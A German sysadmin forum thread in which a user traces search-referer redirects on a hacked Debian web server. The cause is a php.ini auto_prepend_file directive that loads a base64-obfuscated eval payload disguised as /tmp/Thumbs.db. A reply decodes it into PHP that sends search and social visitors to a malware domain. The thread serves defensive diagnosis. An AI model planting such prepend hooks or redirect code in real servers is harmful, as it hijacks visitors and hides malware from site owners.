Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Gesamter Traffic von extern auf finditnow.osa.pl weitergeleitet - wurm- wie entfernen?

Frage Internet Server

Mitglied: Benni88

Benni88 (Level 1) - Jetzt verbinden

30.05.2011, aktualisiert 15:38 Uhr, 4488 Aufrufe, 10 Kommentare

Durch einen Hack in einer Lücke bei Wordpress bin ich Opfer von einem hack geworden.
Ich habe schon einiges probiert bekomme ihn aber leider nicht komplett entfernt und hoffe das man mir hier helfen kann.

Liebe User,

ich bin "Opfer" eines Hackangriffes geworden.
Ich bin selbst Schuld, denn ich hatte ein veraltetes Wordpress auf meinem Server, über den dieser Hack eingeschleust wurde.
http://www.faires-marketing.de/finditnow-osa-pl-hack-unerwunschte-umlei ...

Habe viele Seiten und Foren durchgeforscht, aber mein Problm wurde dadurch leider nicht behoben.

Ein Beispiel:
Geht auf http://www.google.de - gibt dort "lolrofl" ein - lolrofl.net ist meine Seite. klickt ihr den Link nun über google an, kommt ihr auf http://finditnow.osa.pl/atp/?said=3333g&q=lolrofl - und das ist bei all meinen Webseiten so. Auch wenn ein klick über Facebook, Gmail o.ä. kommt auf meine Seiten, wird er auf diese Seite weitergeleitet. (Auch bei Seiten ohne Wordpress)

Ich habe schon alles unternommen, was auf den Webseiten gesagt wird.
Es gibt bei mir keine Dateien mehr, die diesen "Schadcode" in sich haben, die auf finditnow.osa.pl weiterleiten.

Ich habe testweise Dateien erstellt, ohne Inhalt, und habe diese dann über Google und Facebook aufgerufen, und das gleiche Spiel, ich werde auf die Malware Seite weiter geleitet. Obwohl nichts in der Datei drin steht. Auch ist in dem Ordner der Webseite keine .htaccess File.

Ich weiß einfach nicht mehr wo ich suchen soll und woran es liegen kann das es immer noch bei allen Seiten mit .php so ist.

Habt ihr noch eine Idee, wo sich dieser Wurm vergraben hat das ich ihn nicht finde oder was ich machen kann?

Ich danke euch schonmal, ich sitze schon seit Samstag dran und ich habe auch schon eine Firma beauftragt, aber selbst die tapt weiterhin im dunkeln.

Dankeschonmal!

Liebe Grüße,
Benni
Mitglied: nikoatit
30.05.2011 um 15:37 Uhr
"Liebe User vom Debianforum.de,"?
Glaube du bist erst mal im falschen Forum!
Bitte warten ..
Mitglied: Benni88
30.05.2011 um 15:39 Uhr
Zitat von nikoatit:
"Liebe User vom Debianforum.de,"?
Glaube du bist erst mal im falschen Forum!

Verschrieben! Sorry
Bitte warten ..
Mitglied: Phalanx82
30.05.2011 um 15:49 Uhr
Ehrliche Antwort?

Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.


Ganz ehrlich,

Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.

Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:

Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.


Mfg.
Bitte warten ..
Mitglied: Benni88
30.05.2011 um 15:53 Uhr
Zitat von Phalanx82:
Ehrliche Antwort?

Wichtige Daten sichern -> Rechner platt machen!
Das ist der einzigst halbwegs sichere Weg, den Rechner auch wirklich
von Schadsoftware zu befreien. Wenn man ganz paranoid ist, kann man
auch noch das Cmos clearen, das Bios neu aufflashen, die Ram Bausteine
ausbauen, ein paar Stunden liegen lassen und danach die Contakte alle kurzschließen...
Und die Festplatte an einem sauberen PC mit Live-CD wipen.


Ganz ehrlich,

Du weißt nicht ob nun ausschließlich dieser Wurm (oder was auch immer) auf deinem
System herum geistert und wo er sich überall versteckt hat, ggf. Windows Daten
manipuliert und vor allem ggf. weitere Schadsoftware nachgeladen hat.

Daher rate ich dir, wie jedem anderen auch der Opfer von Viren/Würmern/Trojanern
geworden ist, ohne das der Virenwächter (falls vorhanden) Alarm geschlagen hat:

Backup der wichtigen Daten und Kiste neu machen. Damit tust du Dir, vor allem deinem
Gewissen einen Gefallen, denn du kannst danach sicher sein das dein Rechner sauber ist.
Und vor allem tust du auch anderen einen Gefallen wenn du den Rechner platt machst,
denn du wirst somit u.U. nicht selbst noch zur Virenschleuder die anderen Leuten die
Rechner verbiegt.


Mfg.

Danke für die Antwort, aber es handelt sich um einen Debian Webserver
Bitte warten ..
Mitglied: nikoatit
30.05.2011 um 15:55 Uhr
Und wenn du es noch etwas sicherer haben willst, dann könntest du die Platte sogar mit einem Tool wie dban komplett mit Nullen (oder Einsen) überschreiben.
Oder du nimmst gleich eine neue Platte, dann ist es sicher, dass sich kein Kein Schädling in einem verstecken Bereich breitgemacht hat.
Bitte warten ..
Mitglied: m3adow
30.05.2011 um 15:59 Uhr
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?

Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP plattmachen und inklusive Plugins neu installieren und konfigurieren.
Bitte warten ..
Mitglied: Benni88
30.05.2011 um 17:29 Uhr
Zitat von m3adow:
Ist das Problem nur bei Wordpress oder allgemein auf deinem Webserver?

Wenn es nur bei Wordpress ist, würde ich die Datenbank nach entsprechenden Einträgen durchsuchen, alle Ersetzen, WP
plattmachen und inklusive Plugins neu installieren und konfigurieren.


Nicht nur Wordpress Dateien. Alle .php Dateien tun dies, wenn über einen Ref diese PHP File geöffnet wird
Bitte warten ..
Mitglied: Lochkartenstanzer
31.05.2011 um 07:47 Uhr
Zitat von Benni88:

Danke für die Antwort, aber es handelt sich um einen Debian Webserver

Die Aussagen gelten für debian genauso wie für Windows, BSD, Solaris, DOS, ...
Bitte warten ..
Mitglied: Benni88
31.05.2011 um 08:35 Uhr
gefunden!

]; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =/tmp/Thumbs.db

cat /tmp/Thumbs.db
<?php @eval(base64_decode("DQoNCmVycm9yX3JlcG9ydGluZygwKTsNCiRuY2N2PWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkbmNjdil7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQoNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJhb2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0d2l0dGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm1zbiIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vayIpKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsJCQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbHVkd2lnLmJlZS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0=")); ?>
Bitte warten ..
Mitglied: Phalanx82
31.05.2011 um 12:04 Uhr
Na das sieht mir doch schonmal verdächtig aus.

Hier mal der Inhalt der Base64 Codierung:

01.
zö¥m«ë‡^r‡^ 
02.
 
03.
error_reporting(0); 
04.
$nccv=headers_sent(); 
05.
if (!$nccv){ 
06.
$referer=$_SERVER['HTTP_REFERER']; 
07.
 
08.
if (stristr($referer,"aol") or stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) { 
09.
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		 
10.
		header("Location: http://ludwig.bee.pl/"); 
11.
		exit(); 
12.
13.
14.
}
Das sieht mir eindeutig nach Schädlingsbefall aus.

Mfg.
Bitte warten ..
Ähnliche Inhalte
Monitoring
Linux Netzwerkanalyse - Traffic im gesamten Netz messen
gelöst Frage von julien92Monitoring2 Kommentare

Hallo ihr Administratoren :) Zur Zeit bastel ich an einem Raspberry, welches über ein Display, sowie über ein Webinterface ...

Sicherheit
Ist es möglich mit pfSense den gesamten Ein- und ausgehenden Traffic zu protokollieren - wenn ja, auch TLS bzw. SSL?
Frage von thomasreischerSicherheit5 Kommentare

Hallo zusammen, die Frage steht eigentlich schon in der "Überschrift". :-) Bei bestimmten Systemen ist es nämlich so dass ...

Router & Routing
Fritzbox als VPN-Server, Mikrotik als VPN-Client, gesamten Traffic tunneln
gelöst Frage von pellerRouter & Routing13 Kommentare

Hallo, ich habe folgendes gegeben: eine Fritzbox 7490 mit VPN-Server in Deutschland ein Internetanschluss im Ausland eine Mikrotik hAP ...

Instant Messaging
Skype4B soll nach extern und von extern erreichbar sein
Frage von IT-twakInstant Messaging1 Kommentar

Hallo, ich sags im Vorfeld: ich habe schon ein paar Quellen studiert, aber da ich noch recht neu mit ...

Neue Wissensbeiträge
Windows 10

Windows 10 Fall Creators Update - Neue Funktion Hyper-V Standardswitch kann ggf. Fehler bei Proxy Configs verursachen

Erfahrungsbericht von rzlbrnft vor 8 StundenWindows 102 Kommentare

Hallo Kollegen, Da wir die Gefahr lieben, haben wir bei einigen Usern nun mittlerweile das Creators Update drauf. Einige ...

Sicherheit

TLS-Zertifikat und privater Schlüssel von Microsofts Dynamics 365 geleakt

Information von Penny.Cilin vor 10 StundenSicherheit

Microsoft hat versehentlich das TLS-Zertifikat inklusive dem privaten Schlüssel seiner Business-Anwendung Dynamics 365 geleakt. TLS-Zertifikat und privater Schlüssel von ...

Viren und Trojaner

Deaktivierter Keylogger in HP Notebooks entdeckt

Information von bitcoin vor 1 TagViren und Trojaner3 Kommentare

Ein Grund mehr warum man Vorinstallationen der Hersteller immer blank bügeln sollte Der deaktivierte Keylogger findet sich im vorinstallierten ...

Router & Routing

Lets Encrypt kommt auf die FritzBox

Information von bitcoin vor 1 TagRouter & Routing

In der neuesten Labor-Version der FB7490 integriert AVM unter anderem einen Let's Encrypt Client für Zugriffe auf das Webinterface ...

Heiß diskutierte Inhalte
Netzwerkmanagement
Firefox Profieles im Roaming
gelöst Frage von Hendrik2586Netzwerkmanagement17 Kommentare

Hallo liebe Leute. :) Ich hab da ein kleines Problem, welches anscheinend nicht unbekannt ist. Wir nutzen hier in ...

Netzwerkmanagement
NAS über zwei weitere Ethernet Anschlüsse verbinden
gelöst Frage von Sibelius001Netzwerkmanagement15 Kommentare

Sorry - ich bin hier wahrscheinlich als kompetter IT Trottel unterwegs. Aber eventuell kann mir jemand ganz einfach helfen: ...

LAN, WAN, Wireless
Häufig Probleme beim Anmelden in WLAN
Frage von mabue88LAN, WAN, Wireless15 Kommentare

Hallo zusammen, in einem Netzwerk gibt es relativ häufig (1-2 mal pro Woche) Probleme mit der WLAN-Verbindung. Zunächst mal ...

Netzwerkgrundlagen
Hi eine blöde frage. xD
Frage von 132954Netzwerkgrundlagen12 Kommentare

Also: Habe 2012 r2 essentials neuinstalliert, allerdings installiert diese version ja gleich diesen gangen AD kram mit, den hab ...